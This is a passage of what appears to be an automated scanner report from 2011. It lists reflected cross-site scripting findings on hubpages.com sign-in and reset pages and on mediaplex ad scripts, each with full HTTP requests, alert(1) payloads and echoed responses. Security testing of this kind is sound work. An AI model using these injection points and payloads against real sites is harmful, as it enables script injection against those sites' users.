This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=highc6bba"><script>alert(1)</script>4d65f9ca019&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.107. https://hubpages.com/signin/ [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd9a0"><script>alert(1)</script>dcbf5fa54aab84836 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsfd9a0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcbf5fa54aab84836; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsfd9a0"><script>alert(1)</script>dcbf5fa54aab84836&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.108. https://hubpages.com/signin/ [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c59"><script>alert(1)</script>1de617bf248 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:37 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstatsd5c59%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1de617bf248; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.; path=/; domain=.hubpages.com
Content-Length: 7895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstatsd5c59"><script>alert(1)</script>1de617bf248&explain=view%20your%20account%20settings.', 'Sign In to HubPages'); return false;">
...[SNIP]...

1.109. https://hubpages.com/signin/reset/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ae0"><script>alert(1)</script>bfb058226eeddffe7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:21 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinf4ae0"><script>alert(1)</script>bfb058226eeddffe7/reset/?email=', 'Page not found'); return false;">
...[SNIP]...

1.110. https://hubpages.com/signin/reset/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9430"><script>alert(1)</script>d04be060a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinc9430"><script>alert(1)</script>d04be060a2d/reset/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinc9430"><script>alert(1)</script>d04be060a2d/reset/', 'Page not found'); return false;">
...[SNIP]...

1.111. https://hubpages.com/signin/reset/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61b00"><script>alert(1)</script>db9cbd8e43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset61b00"><script>alert(1)</script>db9cbd8e43/ HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:08 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset61b00"><script>alert(1)</script>db9cbd8e43/', 'Page not found'); return false;">
...[SNIP]...

1.112. https://hubpages.com/signin/reset/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40bce"><script>alert(1)</script>e3e68d52e9c6e238a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email= HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/reset/
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:29 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset40bce"><script>alert(1)</script>e3e68d52e9c6e238a/?email=', 'Page not found'); return false;">
...[SNIP]...

1.113. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hubpages.com
Path:	/signin/reset/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ca6"><script>alert(1)</script>e2a9419b373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:59 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/reset/?a3ca6"><script>alert(1)</script>e2a9419b373=1', 'Reset Your HubPages Password'); return false;">
...[SNIP]...

1.114. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5f65"%3balert(1)//e3cc197dac6 was submitted in the mpck parameter. This input was echoed as e5f65";alert(1)//e3cc197dac6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5De5f65"%3balert(1)//e3cc197dac6&mpt=[2065384166ER]&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:2060/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:47 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:35:49 GMT
ETag: "722e8f-c74-49bf45d733740"
Accept-Ranges: bytes
Content-Length: 4408
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/10105-118547-2060-6?mpt=[2065384166ER]e5f65";alert(1)//e3cc197dac6\" target=\"_blank\">
...[SNIP]...

1.115. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cf9c"%3balert(1)//3ea9afa3053 was submitted in the mpvc parameter. This input was echoed as 7cf9c";alert(1)//3ea9afa3053 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5D&mpt=[2065384166ER]&mpvc=7cf9c"%3balert(1)//3ea9afa3053 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:2060/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:49 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:35:49 GMT
ETag: "722e8f-c74-49bf45d733740"
Accept-Ranges: bytes
Content-Length: 4384
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=7cf9c";alert(1)//3ea9afa3053http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065384166ER%5D&clickTag=7cf9c";alert(1)//3ea9afa3053http://altfarm.mediaplex.com%2Fad%2Fck%2F10105-118547-2060-6%3Fmpt%3D%5B2065
...[SNIP]...

1.116. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a882"><script>alert(1)</script>21df409d40e was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D51106614a882"><script>alert(1)</script>21df409d40e&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:17 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6963
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=51106614a882"><script>alert(1)</script>21df409d40e" TARGET="_blank">
...[SNIP]...

1.117. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df09"%3balert(1)//f3d279bcdd was submitted in the mpck parameter. This input was echoed as 1df09";alert(1)//f3d279bcdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D51106611df09"%3balert(1)//f3d279bcdd&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:19 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6763
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/4061
...[SNIP]...
lick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/40619671/1;u=885ae1c570ca4d369ef281e418082327;~sscs=?http://altfarm.mediaplex.com/ad/ck/10105-114325-17214-18?mpt=51106611df09";alert(1)//f3d279bcdd\" target=\"_blank\">
...[SNIP]...

1.118. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e06b"%3balert(1)//0812ffa0161 was submitted in the mpvc parameter. This input was echoed as 3e06b";alert(1)//0812ffa0161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-17214-18%3Fmpt%3D5110661&mpt=5110661&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aab/3/0/%2a/h%3B236309877%3B0-0%3B0%3B18273353%3B4307-300/250%3B40601884/40619671/1%3Bu%3D885ae1c570ca4d369ef281e418082327%3B%7Esscs%3D%3f3e06b"%3balert(1)//0812ffa0161 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.amazon.com/aan/2009-09-09/static/amazon/iframeproxy-2.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=12109:6166; mojo3=10105:17214/1551:16084/17339:3601/14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:31:24 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:24:55 GMT
ETag: "770d6a-da7-49c04fa00c7c0"
Accept-Ranges: bytes
Content-Length: 6753
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://ad.doubleclick.net/click;h=v8/3aab/3/0/*/h;236309877;0-0;0;18273353;4307-300/250;40601884/4061
...[SNIP]...
